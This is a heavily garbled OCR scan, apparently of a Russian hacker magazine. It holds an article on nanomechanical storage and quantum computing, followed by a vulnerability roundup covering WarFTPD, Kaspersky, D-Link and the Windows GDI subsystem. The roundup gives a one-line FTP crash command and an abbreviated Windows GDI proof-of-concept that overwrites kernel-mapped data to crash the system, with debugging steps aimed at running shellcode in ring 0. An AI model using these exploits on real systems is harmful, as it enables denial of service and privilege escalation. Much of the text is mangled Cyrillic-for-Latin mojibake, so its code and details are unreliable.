> Микрофотография и структура М05РЕТ 



Маленькие размеры устройства позволяют 
ему достичь высокочастотных вибраций (в 
опытах — до 23,57 МГ ц). Эта частота отражает 
скорость чтения записанной информации. 

Для сравнения, винчестеры в современных 
ноутбуках характеризуются скоростью считы- 
вания информации в несколько сот килогерц 
(тысяча циклов в секунду). Ученые заверяют, 
что наномеханические ключи могут достичь 
скорости до миллиарда циклов в секунду. 
Альтернативный вариант механических 
устройств хранения данных — всем извес- 
тная «многоножка» отІВМ, которая должна 
появиться на рынке в 2007 году. То, что она 
появится, сомнений нет, так как 1 1 марта 2005 
на выставке СеВіі в Г анновере ІВМ представи- 
ла работоспособный чип устройства МіІІіресІе 
(«многоножка»). 

Благодаря нанотехнологиям чип изготов- 
лен по 10-нм техпроцессу, позволяющему 
размещать на органической пленке, которая 
выступает в качестве носителя информации, 
углубления диаметром 1 0 нанометров. 
Расстояние между углублениями составля- 
ет 1 00 нанометров, что дает возможность 
поместить на чипе довольно большую 
матрицу атомно-силовых щупов (кантиле- 
веров). Наличие углубления соответствует 
логической единице, а его отсутствие 

— логическому нулю. Кантилевер-щуп 

— это специальный атомно-силовой зонд, 
который «ощупывает» сканируемую повер- 
хность, изменяя свое положение в про- 
странстве в зависимости от того, встретит 
ли он на пути углубление или нет. 

При чтении данных специальный привод 
кремниевого «стола», на котором помещена 
пленка с данными, перемещает ее в плоскос- 
ти по заданным координатам X и У. А привод 
мультиплексора позволяет управлять каждым 
кантилевером в отдельности, обеспечивая 
адресацию памяти. Благодаря большому 
количеству щупов матрица кантилеверов 
обеспечивает параллельное чтение или 
запись данных. 

Операция записи происходит термомехани- 
ческим путем с помощью головок кантилеве- 
ров. Для поддержания постоянной темпера- 
туры пленки, необходимой для проведения 
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процедур записи и стирания данных, на чипе 
находится ряд нагревательных элементов. 
Принцип работы устройства в целом заимство- 
ван у систем, работающих с перфокартами. Но 
в отличие от бумажных перфокарт, «много- 
ножка» умеет стирать продырявленную ею 
информацию благодаря пластическим свойс- 
твам ПММА и ряду нагревательных элементов. 
Готовый выставочный чип «многоножки» 
может хранить 1 ,2 терабит (или 1 53 Гб) на 
площади в 1 квадратный дюйм. 

Для сравнения представь чип размерами с 
почтовую марку, на которой можно записать 
содержимое 25-ти ЭѴЭ-дисков. Размеры 
матрицы 4096-ти кантилеверов, представ- 
ленной на выставке в Г анновере, — 6, 3x6,3 
миллиметра. 

Как утверждает Йохан нес Вайндлен, менед- 
жер проекта МіІІіресІе в ІВМ, минимальная 
емкость «многоножки» составит 10 Гб. 
Вайндлен также заявил, что ІВМ уже способна 
изготовить «многоножек» в серийном испол- 
нении на базе кремниевых МЭМС. 



□ Квантовые компьютеры 

Как ни крути, но атомы и молекулы — хорошо, 
а кванты лучше. Тем, что на их основе можно 
такого навертеть, что самый продвинутый 
механоэлектрический комп будет просто 
отдыхать. Не зря считают человеческий мозг 
большим квантовым компьютером, в котором 
миллионы процессов проходят параллельно. 
Квантовые компьютеры оперируют квантовы- 
ми битами (циЬіІз), или кубитами. Обычный бит 
— это классическая система, у которой есть 
только 2 возможных состояния. Можно ска- 
зать, что пространство состояний бита — это 
множество из двух элементов, например из 
нуля и единицы. Кубит же — это квантовая 
система с двумя возможными состояниями. 
Имеется ряд примеров таких квантовых 
систем: электрон, у которого спин может 
быть равен либо 1/2, либо -1/2 , или атомы в 
кристаллической решетке. Поэтому кубиты 
могут иметь большее множество состояний, 
чем традиционные биты, благодаря чему кван- 
товые компьютеры способны обрабатывать 
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> Молекулярный штырь — основа механического нанокомпьютера 



много параллельных процессов одновремен- 
но. И основная сила квантовых систем заклю- 
чается именно в этой параллельности проте- 
кающих в них процессов. Один простенький 
компьютер «на квантах» будет в состоянии 
работать одновременно над неограниченным 
количеством задач. 

Связано это с фундаментальным устройством 
нашего с тобой мира. Если заглянуть поглуб- 
же в мир квантов, то можно увидеть целый 
скоп потенциально возможных состояний 
системы кубитов, которые и будут исполь- 
зоваться при расчете той или иной задачи. 

Это состояние называется «запутывание» 
(епіапдіетепі). Другая отличительная черта 
квантовых компьютеров — явление квантовой 
телепортации информации. Уже в 1 993 году 
ученый Ч. Беннетт обнаружил, что теорети- 
чески возможно использовать запутывание 
кубитов передачи информации (телепорта- 
ции) неизвестного для отправителя А кван- 
тового состояния двухуровневой системы к 
получателю В без реального перемещения 
самого элемента! 

Эта мысль стала далее основной для разви- 
тия принципиально нового метода секретной 
передачи информации. Перечень возможных 
приложений запутанного состояния кубитов 
уже достаточно велик. Оно является одним 
из корней ожидаемых успехов квантовых 
вычислительных процессов, поскольку от- 
крывает принципиально новые возможности 
кодирования информации. 

Для взлома тут, конечно, перспективы сумас- 
шедшие — квантовый компьютер способен 
за мизерное время перебрать миллиарды 
комбинаций. Да и не перебрать вовсе — они 
будут просто находиться в нем «изначально» 
благодаря квантовому запутыванию. 

Кроме счетных устройств, квантовые системы 
могут использоваться в хранении данных. 
Причем в роли битов выступают отдельные 



атомы. Недавно атомную стек-память пред- 
ставили ученые из Университета Бонна в 
Г ермания. С помощью двух направленных ла- 
зерных лучей они создали обособленный ряд 
из отдельно стоящих атомов цезия. Для того 
чтобы синтезировать такую экзотическую 
структуру, ученые должны были поймать и ох- 
ладить атомы цезия до субмилликельвиновых 
температур в вакууме. Потом исследователям 
удалось выстроить их в одну горизонтальную 
линию в волновой ловушке оптических дипо- 
лей, образованной двумя лазерными лучами. 
Для того чтобы потом помещать или удалять 
атомы из регистра, ученые использовали 
оптический пинцет, сформированный другой 
парой лазерных лучей в вертикальной 
плоскости. 

Работа с атомами была похожа на конвейер: 
сначала их расставляли в горизонтальном 
направлении, затем подводили «сверху» 
вертикальный оптический пинцет и выдерги- 
вали нужные атомы, а уже потом ставили их на 
другую позицию в «сборочной линии». 

Теперь ученые корпят над построением 
квантового транзистора, который смог бы 
записывать информацию в атомный регистр. 
Насколько близко мы подошли к действую- 
щему квантовому компьютеру? Прежде всего 
необходимо создать элементы проводников, 
памяти и логики. Затем эти простые элементы 
нужно заставить взаимодействовать друг с 
другом. После этого надо выстроить узлы в 
полноценные функциональные чипы и на- 
учиться тиражировать их. По оценкам ученых, 
прототипы таких компьютеров могут поя- 
виться уже в 2005 году, а в 201 5 — 2030 годы 
должно начаться их массовое производство. 

О Что же дальше? 

По крайней мере лет 1 5 еще волноваться 
не стоит — все это время будет править бал 
классическая электроника с некоторыми 



ухищрениями вроде «многоножки» или 
нанотрубочных транзисторов. Но уже через 
лет 20 — 30 элементная база может сущест- 
венно измениться. Квантовые компьютеры, 
правда, в быту начнут использоваться не 
раньше чем через 30 лет, в то время как 
наномеханика может появиться уже через 
десятилетие. 

Скорее всего, благодаря альтернативным 
подходам в микроэлектронике произойдет 
технологический скачок с тысячекратным 
увеличением мощности компьютеров. 

Если хотя бы на каком-нибудь из выше- 
указанных направлений удастся добиться 
успеха, то компьютеры могут стать вообще 
повсеместно используемыми. А если таких 
успешных направлений будет несколько, то 
они распределятся по разным нишам. На- 
пример, квантовые компьютеры будут спе- 
циализироваться на шифровании и поиске 
в крупных массивах данных, молекулярные 
— на микромашинах и управлении произ- 
водственными процессами, а оптические и 
электронные — на средствах связи. 

В нашем веке мы с тобой будем свидетелями 
того, как вычислительная техника сольется не 
только со средствами связи и машинострое- 
нием, но и с нашими телами, что откроет такие 
возможности, как создание искусственных 
имплантантов, интеллектуальных тканей, 
разумных машин, «живых» компьютеров и 
человеко-машинных гибридов. 

Термин «квантовый скачок» означает, что в 
квантовом мире изменения происходят не 
постепенно, а скачками. Похоже, что где-то 
около 2020 года, если не раньше, подобный 
скачок произойдет и в вычислительной 
технике: к тому времени мы перейдем оттра- 
диционных кремниевых полупроводников к 
более совершенным технологиям, благо на- 
работок много, и они уже готовят фундамент 
для электроники нового поколения. ПС 
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ОѴѴагРТРО: отказ в обслуживании через 
^огтаізігіпд 

Вгіе'Г 

Это древний (или, скорее, исторический), 
могучий, нетребовательный к ресурсам и 
к тому же абсолютно бесплатный Йр-сер- 
вер, созданный норвежским парнем по 
имени Эагіе Аазе (Ярле Осэ). Он очень часто 
используется в качестве Йр-серверов для 
домашних сетей, один из которых стоит у 
меня дома ( Йр://пе 2 иті.огд.пЛ раздавая 
в часы пик десятки тысяч файлов в день. 

Вот только падает иногда. В причинах этих 
падений разобрался испанский хакер 
бохеап Когеі (рхеапкоге! регго уабоо рипіо 
ез), выяснивший, что при попытке обработки 
аргумента, содержащего спецификатор %з, 
сервер вываливается по ошибке доступа 
на инструкции 4315406 МОѴСІ_, [ЕАХ], 
очевидно, вылетающей за границы строки, 
не заканчивающейся нулем. Возможность 
засылки збеІІ-кода крайне сомнительна, но 
ее нельзя исключать на все 1 00%. Ошибке 
подвержены следующие Йр-команды: СѴѴЭ, 
СЭБІР, ЭЕІ_Е, І\Л_ЗТ, І_ІЗТи$І2Е. Подробности 
смотри на ѵѵѵѵѵѵ.зесигіЫосиз.сот/Ыб/20944 . 

Тагде^з 

ѴѴаг РТР Эаетоп 1 .82, 1 .82.00-ЯС1 1 . 

Ехріоі^г 

Для сокрушения сервера ему достаточно 
передать команду сбир %з*256, однако 
следует помнить, что это команда сервера, 
а не клиента! В частности, тз Йр.ехе такой 
команды в своем арсенале не имеет и тупо 
говорит: «Недопустимая команда». Прихо- 
дится использовать іеіпеі. 

Г отовый ехріоіі с комментариями можно 
найти на ѵѵѵѵѵѵ.ІогЫббепѵѵеЬ.ога/Іоріс/1 29579/ 
іпсіех.біті . 

Зоіи+іоп 

Более ранние версии (например, ѴѴагРТРб 
1 .82.00-ВС1 0 от 25 января 2005 года) не име- 
ют этой дыры, поэтому до выхода официаль- 
ной заплатки рекомендуется использовать 
их. 



О АѴР: локальное повышение текущего 
уровня привилегий 

ВгіеТ' 

Известный антивирус Евгения Касперско- 
го (еще раз прошу не путать эту личность 
со мной) неожиданно оказался вирусом! 
Ошибка проектирования в движке пере- 
хватчика І\ЮІЗ-ТЭІ-запросов (и на черта 
антивирусу лезть в N013, это же не бранд- 
мауэр какой-то?) привела к возможности 
передачи некорректных параметров из 
адресного пространства в ядро с захватом 
ядерных привилегий, ошибочно классифи- 
цированных на зесигііу Іосиз как ЗУЗТЕМ 
(смотри зесигіЫосиз.сот/Ыб/20635 ). Для 
реализации атаки достаточно передать 
устройству КШ или КІ_ІСК (соответству- 
ющих драйверам кш.зѵз и киск.зѵз) 
ЮСТБ-код с номером 800521 1 06, а вместе с 
ним — указатель на специальным образом 
сконструированный ІРР-пакет с збеІІ-кодом 
на борту. Честь открытия дыры принадлежит 
24-летнему испанскому хакеру, владельцу 
уникального ресурса ѵѵѵѵѵѵ. геѵегзетосіе. сот 
по прозвищу РиЬеп Запіатагіа, рапортовав- 
шему о проблеме в компанию Юеіепзе І_аЬз 
( ІаЬз.ібеІепзе.сот/іпІеІІіаепсе/ѵиІпегаЫІШез/ 
с!ізрІау.рбр?ісІ=425 ) и очень обижающемуся, 
когда его принимают за японца. В одном из 
своих ехріой'ов он прямо так и написал: «I 
АМ [\ІОТ Трапезе :Р». Кстати, аналогичная 
ошибка была обнаружена в драйвере 
ЗАѴРТ.ЗУЗ отЗутапіес АпііѴігиз версий 8х-9х. 

Тагде*2 

Казрегзку Іпіегпеі Зесигііу 6.0, Апіі-Ѵігиз 
РегзопаІ Рго 5.0, Апіі-Ѵігиз РегзопаІ 5.0, Апіі- 
Ѵігиз іог ѴѴіпбоѵѵз ѴѴогкзіаііоп 5.0, Апіі-Ѵігиз 6.0. 

Ехріоі+г 

АѴР-КЫСК-800521 Ю.с, АѴР-КБІ N-800521 10.С 
и 20635. с на зесигіЫосиз.сот. Первые два 
вызывают крах антивируса, а последний 
передает на нулевое кольцо збеІІ-код). 

Зоіи-Моп 

«Лаборатория Касперского» уже подсу- 
етилась и выпустила обновление ( ѵѵѵѵѵѵ. 
казрегзку.сотЛес6пеѵѵз?ісІ=203038678 ). 



> Помимо дыр в пластмассовом корпусе, 
у этого красавчика полно багов в микро- 
программной прошивке 

^ N 

Ой-Ыпк 05Б-0624Т: неавторизованный 
доступ 

ВгіеТ' 

Еще в одном аппаратном устройстве об- 
наружен целый комплекс дыр. На этот раз 
им стал четырехпортовый беспроводной 
ЭЗБ-модем/маршрутизатор с брандмауэ- 
ром в одном флаконе ЭЗІ_-0624Т от нехи- 
лой фирмы Э-ІЛМК, «распотрошенный» 
испанским хакером по кличке бозе Ратоп 
Раіапсо (іозе.раіапсо регго еа^еі рипіо ез). 

Он специализируется на взломе железа и 
владеет ресурсом ѵѵѵѵѵѵ .еагеі.ез . на котором 
можно найти много полезной информации 
по атакам на2уХЕІ_'и, например. Это уже 
второй испанец в этом обзоре, что на фоне 
упорных занятий испанским языком выгля- 
дит весьма странно. О самом модеме можно 
прочитать на ѵѵѵѵѵѵ.бііпк.со.ик . Он подвер- 
жен трем основным угрозам: 

1 . просмотру каталогов через 
конструкцию/./.; 

2. перекрестному скриптингу 
(сгозззііе зсгірііпд); 

3. просмотру содержимого 
директории сді-Ьіп. 

Тагде* 

Э-Ыпк Э31_-(3624Т Ѵ3.00В01Т01 .УА-С.200. 

Ехріоі+г 

Примеры готовых ехріоіі'ов, реализующих 
все 3 типа атак, лежат на ѵѵѵѵѵѵ.зесигіЫосиз. 
сот/агсбіѵе/1 /449486 . 

Зоіи-Моп 

Производитель (Э-ШК) еще не выпустил 
обновленной версии прошивки, и неизвес- 
тно, выпустит ли он ее в дальнейшем. Поэ- 
тому от использования этого оборудования 
рекомендуется воздержаться. 
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□ Повышение привилегий через дыру в 
601-подсистеме 

Вгіеі 7 

Просто поразительно, как гиганты компью- 
терной индустрии реагируют на сообщения 
об ошибках, которые они не могут исправить. 
22 октября 2004 года основатель группы 
Агдепізз Іпіогтаііоп Зесигііу и ее СЕО в одном 
лице — Сезаг Сегшбо обнаружил серьезней- 
шую ошибку в ѴѴіпбоѵѵз, о чем тут же сообщил 
в МісгозоЙ. Но та продолжила выпускать 
дырявые операционные системы, а для уже 
существующей заплатка отсутствует и по сей 
день. Оскорбленный Агдепізз ПезеагсН Теат 
обнародовал информацию об уязвимости 
вместе с ргооі-оі-сопсері ехріоіі'ом на своем 
сервере ѵѵѵѵѵѵ.агаепізз.сот . откуда она просо- 
чилась на ѵѵѵѵѵѵ.зесигіЫосиз.сот/Ыб/20940 . 

И вновь испанский рулит: штаб-квартира 
Агдепізз'а расположена в Буэнос-Айресе, в 
самом сердце Аргентины! Но это все лирика. 
Переходим непосредственно к сути дела. 
Данные подсистемы ООІ (реализованной, как 
известно, в ядре) проецируются на адресное 
пространство всякого ООІ-процесса в специ- 
альную секцию, доступную только на чтение. 
Однако система не препятствует ремапингу 
секции с атрибутами чтения/записи, что 
позволяет любому локальному пользователю 
проникнуть на уровень ядра (а вовсе не огра- 
ничиться системными привилегиями, как это 
ошибочно полагают парни с зесигііу-іосиз'а). 

По заявлению Агдепізз РезеагсН Теат, уязви- 
мости подвержены ѴѴ2К (до ѴѴ2К ЗР4) и ХР (до 



ХР 32) и не подвержены Зегѵег 2003 и Ѵізіа Ьеіа 2. 
Парни с зесигііу-Іосиз'а с ними не совсем 
согласны и добавляют к списку уязвимых 
систем 2000 Зегѵег (до 2000 Зегѵег ЗР4), 2000 
Оаіасепіег Зегѵег ЗР4, 2000 Абѵапсеб Зегѵег 
ЗР4, ХР х64 и ХР 64-Ьіі 2003 ЗР1 . Не говоря уже о 
такой мелочи, как ХР ТаЫеі РС и ХР Мебіа Сепіег 
со всеми установленными сервис-паками. 

Ехріоі* 

Исходный код ехріоіі'а, составленный на 
приплюснутом Си двумя другими членами 
группы — І_МН ПтІл [а1:]іпТо-риІІ.сот ^ и МоКВ, 
лежит на ргоіесІз.іпІо-риІІ.сот/токЬ/Ьиа- 
ііІез/ОРІКегпеІРоС.срр . Но прежде чем его 
удастся откомпилировать командой 
сі.ехе СЮІКегпеІРоС.срр, придется взять в руки 
напильник и провести небольшую «косме- 
тическую» доработку, а именно заменить 
кавычки вокруг включаемых файлов ѵѵіпбоѵѵз. Н 
и зібіо.Н угловыми скобками. 

Зоіи^іоп 

Официальной заплатки от МісгозоЙ до сих пор 
нет, и все, что нам остается, — это мигриро- 
вать на Зеѵег 2003 или Ѵізіа, в которых огрехи 
проектирования без лишнего шума были 
устранены (но, как известно, исправляя одну 
ошибку, МісгозоЙ добавляет десяток новых; 
Ѵізіа — это не вариант, а вот над переходом на 
Зегѵег 2003 можно подумать). 

Еігсіоге 

То, что СО- и ІІЗЕВ-подсистемы ЫТ являются 
одной большой дырой, — известно еще давно. 
На дефектах проектирования механизма дис- 
петчеризации сообщений основан целый ряд 



атак, позволяющий хакеру манипулировать 
элементами управления более привилегиро- 
ванных приложений (например, отключать 
настройки антивирусов и брандмауэров) или 
даже засылать збеІІ-код в строку редактиро- 
вания, устанавливая на нее таймер, сраба- 
тывающий в контексте привилегированного 
приложения! 

В ЫТ 3.51 графическая подсистема испол- 
нялась науровне пользователя, в связи с 
чем большинству АРІ-функций приходилось 
совершать множество переходов из него в ре- 
жим ядра. Из-за этого все очень сильно тормо- 
зило, и МісгозоЙ пришлось перенести ІІЗЕР- и 
ООІ-подсистемы внутрь ядра, поместив их в 
драйвер ѵѵіп32к.зуз, что вызвало естественный 
вопрос о том, не пострадала ли стабильность 
ѴѴіпбоѵѵз 2000 оттакой операции. Книга «Іпзібе 
Іог ѴѴіпбоѵѵз 2000 МісгозоЙ» (своеобразная 
«библия» по І\ІТ, написанная Хелен Кастер, 
а затем переизданная под именами Дэвида 
Соломона и Марка Руссиновича) гласит: 
«Некоторые интересуются, не повлияет ли 
на стабильность системы перевод такой 
значительной части кода в режим ядра. Но 
риск снижения стабильности системы мини- 
мален ... Так что в ѴѴіпбоѵѵз 2000 ошибки , вроде 
нарушения доступа в том же коде, только 
выполняемом в режиме ядра, просто быстрее 
приводят к краху — исключения в режиме 
ядра требуют прекращения работы системы. 
Правда теоретически появляется другая 
опасность. Поскольку этот код выполняется в 
режиме ядра, ошибка (например, применение 
неверного указателя) может повредить защи- 
щенные структуры данных режима ядра. До 
ѴѴіпбоѵѵз І\ІТ 4 это могло привести к нарушению 
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> Доработка оригинального ехрІоіГа до компилируемого состояния 





> Главная страничка компании Агдепізз 
Ыогтаііоп Зесигііу 



доступа, так как запись в страницы режима 
ядра из пользовательского режима не разре- 
шается. Но результатом стал бы крах системы. 
Теперь же при выполнении кода в режиме 
ядра запись на какую-либо страницу памяти по 
неверному указателю не обязательно вызовет 
немедленный крах системы. Но если при этом 
будут повреждены какие-то структуры данных, 
он скорее всего произойдет. Тем не менее, 
возникает риск, что из-за такого указателя 
будет повреждена не структура данных, а 
буфер памяти, и это приведет к возврату поль- 
зовательской программе или записи на диск 
неверных данных. В заключение отметим, что 
повышение производительности в результате 
перевода диспетчера окон и СО из пользова- 
тельского режима в режим ядра достигнуто 
без сколько-нибудь значимого снижения 
стабильности и надежности системы». 

Как видно, утверждение о «безопасности» 
переноса ООІ внутрь ядра базируется на 
предположении, что «в 001 ошибок нет», при- 
нимаемом за постулат. Но это не верно. Одна 
из таких ошибок в СО как раз и позволила 



проникнуть в ядро с прикладного уровня. 
Операционные системы семейства І\ГГ 
вплоть до Зегѵег 2003 (и основанной на его 
ядре Висте), отображали ядерные структуры 
подсистемы ОЮІ на объект-секцию (не путать 
с секциями РЕ-файла). Все они находятся в 
глобальной разделяемой памяти (дІоЬаІ зітагесі 
тетогу зесііоп), автоматически создаваемой 
системой для любого процесса, использую- 
щего объекты СО, к которым принадлежат все 
0111-приложения. ІІЗЕЯ является всего лишь 
надстройкой над СО. 

Система проецирует секцию на адресное про- 
странство процесса с атрибутами геаб опіу, 
однако никак не догадывается, что пользова- 
телю придет в голову создать ре-проекцию 
001-секции, наделив ее любыми атрибутами, 
какими только душа пожелает (например, 
ѵѵгііаЫе и ехесиіеаЫе), в результате чего у него 
появляется возможность напрямую модифи- 
цировать данные ядра! И все это — даже без 
прав администратора! Обладая правами адми- 
нистратора, можно просто загрузить драйвер 
и не мучиться, правда в 64-битной редакции 



Висты это уже не так. Там для загрузки драйве- 
ра, помимо администраторских полномочий, 
требуется еще и цифровая подпись. 

Самое простое (но не самое умное), что можно 
сделать, — это загадить 001-секцию всяким 
мусором, и тогда система немедленно рухнет, 
высвечивая знаменитый голубой экран. 
Однако при желании можно пойти дальше и 
передать управление на свой зНеІІ-код, выпол- 
няющийся в нулевом кольце. 

Рассмотрим структуру бЮІТаЫеЕпІгу, сово- 
купность которых и образует 001-секцию, 
подлежащую хаку: 

СТРУКТУРА СБІТАВЬЕЕЫТКУ 

ЪуребеТ зЪгисЪ 

1 

ОѴЮІШ рКегпеІІпТо; 

ЖЖО РгосеззЮ; 

ЖЖО _ пСоипР; 

ЖЖ Б гШррег; 

ТлЮКБ пТуре; 

БЖЖО рІІзегІпТо; 

} СОІТаЫеЕпРгу; 




АѴегМе<1\а 

ѵѵѵѵѵѵ. аѵегтесііа.ги 






АѴегТѴ 

НуЬгісІ+РМ СагсІВиз 

• Аналоговое ТВ, цифровое ТВ 
и РМ-радио 

• Стереозвук 

• Сертифицированный логотип 
ѴѴіпсІоѵѵз ХР МСЕ 



АѴегТѴ 

НуЬгісі+РМ РСІ 

• Аналоговое ТВ, цифровое ТВ и 
РМ-радио 

• Функции многооконного РІР/РОР 
просмотра 

• 32/64-разрядная совместимость 

• ПО разработано специально для 
России 



АѴегТѴ 

НуЬгісІ+РМ Ѵоіаг 

• Аналоговое ТВ, цифровое ТВ 
и РМ-радио на Вашей ладони! 

• Возьми с собой в дорогу! 

• РІаличие композитного (КСА) 
видеовхода 

• Стереозвук 

• Новинка 

реклама 
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Мы видим пару интригующих нас элементов 
— ріізегіпіо и рКегпеІІпГэ, представляющих 
собой указатели на пользовательские 
данные и данные режима ядра соответствен- 
но. Вот они-то и дают ключ к воздействую 
на память ядра из прикладного адресного 
пространства. Но прежде чем двигаться 
дальше, изучим код ехріоіі'а, имеющийся в 
нашем распоряжении и вызывающий ВЗСЮ. 
Для наглядности (и экономии бумажного про- 
странства) он приведен со значительными 
сокращениями, акцентирующими алгоритм 
его работы и отправляющими все несущест- 
венные мелочи в /беѵ/пиІІ. 

ЕХРЬОІТ ОТ АКСЕЫІЗЗ КЕЗЕАКСН ТЕАМ В 
СОКРАЩЕННОМ ВАРИАНТЕ 

буребеб збгисб _ ЗЕСТІОЫ _ ВАЗІС _ 
ШЕОКМАТІОЫ 

1 

чьсжс бооо; 

бЛЬСШС ЗесбіопАббгіЪибез; 

ЪАНСЕ _ ШТЕСЕК ЗесбіопЗіге; 

} ЗЕСТКЖ _ ВАЗІС _ ШЕОКМАТІОЫ; 

// объявляем функцию обратного вызо- 
ва для ЫбОиегуЗесбіоп 
буребеб БѴЮКВ (САЬЪВАСК* 
ИТОЮЕКУЗЕСТІОИ) (НАЫБЬЕ, БЮКБ, 
РѴОЮ, БТлЮК.0, ОТлЮНБ*) ; 

іпб таіп(іпб агдс, сНаг* агдѵ[]) 

! 

// дескриптор мап-файла 
НАЫОЬЕ НМарЕіІе = 0x10; 

// вызываем СгеабеЫіпбоіл/, 

// чтобы система создала СОІ-секцию 
// в адресном пространстве нашего 
// процесса 

Шіп = СгеабеЫіпбом (0, 0, 0, 0, 

0, 0, 0, 0, 0, 0, 0); 
ѵлЬіІе ( ! ІрМарАббгезз) 

< 

НМарЕіІе = НМарЕі1е+1; 
1рМарАббгез5=МарѴіеілЮбЕі1е 
(НМарЕіІе, 

ЕІЬЕ _ МАР _ АЬЬ _ АССЕЗЗ, 



0 , 0 , 0 ); 

І 

// перечисляем все секции 
// нашего процесса 
Ыб<2иегуЗесб=СебРгосАббгезз 

(ЬоабЬ іЬгаг у ("N6611.611") , 
"ИбОиегуЗесбіоп") ; 
ЫбОиегуЗесбіоп (НМарЕіІе, 0, 

&Ъибб, зІ 2 еоб(Ъибб) , 0); 
дбіТаЫе = (СОІТаЫеЕпбгу*) 
ІрМарАббгезз; 

// записываем в СОІ-баЫе 
// всякий мусор 
Тог ( і= 0 ; 

КЪибб. ЗесбіопЗіге.ОиабРагб; 
і+=зІ 2 еоб (СБІТаЫеЕпбгу) ) 

д6іТаЫе-> _ пСоипб = 0x5858; 
дбіТаЫе ->пТу ре = 0x5858; 
д6іТаЫе->пЮррег = 0x5858; 
дбіТаЫе->Ргосез5Ю = 0x5858; 
д6іТаЫе->рКегпе1ІпТо = 
0x58585858; 

д6іТаЫе->рІІзегІпТо = 
0x58585858; 

д6іТаЫе++; 

■ 

I 

Компилируем код и запускаем на выполне- 
ние (лучше на виртуальной машине, чтобы в 
случае чего не порушить основную систе- 
му), предварительно переключив машину 
в режим сохранения полного дампа (Мой 
компьютер -> Свойства -> Дополнительно -> 
Загрузка и восстановление -> Запись отла- 
дочной информации -> Полный дамп памяти). 
Говорим «ОК» и перезагружаемся. Запуска- 
ем ранее откомпилированный ехріоіб Если 
все прошло успешно, то через несколько 
секунд система падает в голубой экран. 
Обладая дампом памяти, мы сможем разо- 
браться, в каком именно месте происходит 
исключение, как обрабатываются указате- 
ли и что необходимо предпринять для подго- 
товки зГіеІІ-кода к засылке и выполнению. 



Для анализа дампа нам понадобятся отлад- 
чик Місгозоіі — І386кб.ехе или его графи- 
ческий аналог — ѵѵіпбЬд.ехе, входящие 
в состав как «слоноподобного» ЫТООК, 
так и компактного ОеЬиддіпд Тооіз Гэг 
ѴѴіпбоѵѵз, бесплатно распространяемого 
МісгозоЙ ( ѵѵѵѵѵѵ.тісгозоіі.сот/ѵѵітбс/беѵіооіз/ 
6еЬ^ааіпа/іпзIаIIx86■тзрx , ) и занимающего 
порядка 15 Мб. Кстати говоря, это очень 
хорошие отладчики с богатыми возможнос- 
тями и шикарными расширениями, оставля- 
ющими ЗоШСЕ далеко позади себя в плане 
функциональности. Так плагин ІодехІз.бІІ 
позволяет вести мониторинг АРІ-функций, 
а грсехіз.бІІ — РРС-вызовов. Но сейчас нам 
эти возможности не понадобятся, зато пот- 
ребуются отладочные символы. Их можно 
скачать со специального сервера Місгозоф 
достаточно лишь создать командный файл 
следующего содержания: 

КОМАНДНЫЙ ФАЙЛ, ЗАПУСКАЮЩИЙ ОТЛАД- 
ЧИК ДЛЯ АНАЛИЗА ДАМПА ПАМЯТИ 
ЗЕТ _ ЫТ _ ЗУМВОЪ _ РАТН=ЗКѴ*С:\ 
ТЕМР*Нббр://тзб1.тісгозобб .сот/ 
бомпІоаб/зутЪоІз 

гет І386кб -2 С:\ЫІЫЫТ\тетогу.6тр 
гет міпбЪд -2 С:\ЫШЫТ\тетогу.бтр 

Здесь СЛТЕМР — каталог, куда будут скла- 
дываться отладочные символы, автомати- 
чески скачиваемые отладчиком из сети; С:\ 
ѴѴІМЫТЛтетогу.бтр — путь к файлу дампа; 
РЕМ позволяет выбирать между консольным 
и графическим отладчиком по своему пред- 
почтению. После загрузки дампа памяти в 
отладчик его окно будет выглядеть прибли- 
зительно так, как показано на скриншоте 
(раскладка окон должна настраиваться 
каждым пользователем индивидуально, в со- 
ответствии с его вкусами и потребностями). 
Для выдачи дополнительной информации 
ѵѵіпбЬд предлагает нам ввести команду 
Іапаіуге-ѵ. Что ж, нас не нужно просить 
дважды. Вводим ее в командой строке, и вид 
отладчика тут же преображается. 
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> Голубой экран смерти, появляющийся благодаря успешной работе ехрІоіГа ОРІКегпеІРоС.срр 



Курсор дизассѳмблѳрного листинга останав- 
ливается строкой ниже піІКеВидСбескЕх, ни- 
чего не говоря нам об истинной локации сбоя. 
А вот командное окно говорит. Прокручиваем 
его мышью и видим: 

ИСТИННОЕ МЕСТО СБОЯ ПО ДАННЫМ ВСТРО- 
ЕННОГО АНАЛИЗА ДАМПОВ 

ЕАІІЪТІЫС _ ІР: 

^іп32к!НшдІпсгешеп1іЗНагеКеГегепсеС 

оипГ+37 

а0016Ъ8е ГГ4004 іпс сЛлюгсі рГг 
[еах+0х4] 



Вот это уже ближе к телу! На самом деле сбой 
произошел в функции НптдІпсгетепіЗбагеЯе 
ІегепсеСоипі, находящейся внутри драйвера 
ѵѵіп32к.зуз по смещению 376 байт от ее начала, 
где оказалась команда іпс сіѵѵогсі ріг [еах+46]. 
Но каким образом данные попали туда и как на 
них можно воздействовать? Чтобы отрыть ис- 
тину, у нас есть 2 пути — загрузить \д/іп32к.зуз 
в ЮА Рго и дизассемблировать Нтдіпсгет 
епіЗбагеВеіегепсеСоипі или же установить 
на НтдІпсгетепіЗбагеВеіегепсеСоипі точку 
останова и, вновь запустив ехріоіі, начать 
трассировать ее, разбираясь, каким имен- 



но образом она «перерабатывает» данные 
секции ООІ. Для этого нам понадобится любой 
отладчик ядра — ЗоЙІСЕ или МісгозоЙ І386кб, 
однако последний требует для отладки сразу 
две машины, соединенные СОМ-шнурком. 
Впрочем, одна из них может быть и виртуаль- 
ной. ѴМѴѴаге позволяет пихать СОМ-порт в 
ріре, упрощая отладку. 

Основные принципы отладки описаны в «Тех- 
нике отладки программ без исходных текстов», 
которую можно слить с моего Йр, написав 
первый ехріоіі:, который не грохает систему, а 
делает что-то полезное. И-Е 




ѵѵѵѵѵѵ.хакер.ги 


















^ взлом 



ВКЬУАКОРРйМАП.КО 

ѴѴМѴѴ.5КІ-ѴАР0РР.ГІ) 



( Р КАКИЕ Е-2ШЕ ПОСОВЕТУЕШЬ ПОЧИТАТЬ И ГДЕ ИХ МОЖНО 
СКАЧАТЬ? 

А: Никаких новых ярких электронных журналов сейчас нет ни 
у нас, ни на Западе. Из авторитетных «старичков» назову 
англоязычные РТігаск, 29А, СосІеЬгеакегз, ВРІ_Р, Ь4Ь0, ЬОд, 
40НЕХ, азтритаі, ѵіасі. На русском можно выделить ІМідІіі РаІІ, 
х25гіпе, хаос, ВІЫСЮ, ІпіесіесІ Ѵоісе, ОеіасесІ, РОЗ, 2етзкіу 
